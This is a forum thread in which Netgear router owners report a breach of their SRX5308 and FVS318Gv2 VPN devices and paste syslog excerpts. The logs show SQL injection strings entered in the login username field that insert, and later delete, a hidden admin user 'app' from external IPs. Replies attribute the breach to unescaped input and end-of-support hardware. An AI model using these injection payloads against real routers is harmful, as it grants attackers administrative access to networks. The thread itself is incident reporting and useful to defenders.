- Subscribe to RSS Feed
- Mark Topic as New
- Mark Topic as Read
- Float this Topic for Current User
- Bookmark
- Subscribe
- Printer Friendly Page
Successful hack of our SRX5308
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Successful hack of our SRX5308
Hi,
Our SRX5308 was successfully hackedon Sep 27th. They seem to have found a SQL password that keeps users in a an internal database and injected a new user 'app'. We had SYSLOG to another machine ,so we caught the successful attempt and steps:
I don't know how to prevent this attack later, as they seem to have a direct way to inject with a known DB password
Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:43 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:46 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:19:51 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:53 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:55 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:58 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:59 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:20:03 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:04 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:08 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:11 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:12 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:30 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:20:31 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Successful hack of our SRX5308
It seems like a very old school DB injection during log in. Seems that Netgear does not db_escape their user input. Gawd!
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Successful hack of our SRX5308
These have been out of support for a little while now. Sadly, Netgear hasnt' seen fit to really replace them properly yet, so some vulnerability was bound to crop up eventually.
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Successful hack of our SRX5308
This is the reason I upgraded my perfectly working Prosafe FVS336Gv3 VPN routers to the BR500, end of support and firmware upgrades. Sadly, the BR500 is not reliable.
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Successful hack of our SRX5308
Same exploit on my FVS318Gv2 running firmware 4.3.5-3. Same user "app" added via SQL insertion on the login/password form. Not clear if anything was taken.
[FVS318Gv2]Wed Nov 20 06:51:56 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Administrator app is successfully added. Group: geardomain User TimeOut: 5
[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90
[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90
[FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90
[FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90
[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
[FVS318Gv2]Wed Nov 20 06:52:17 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Deleted User app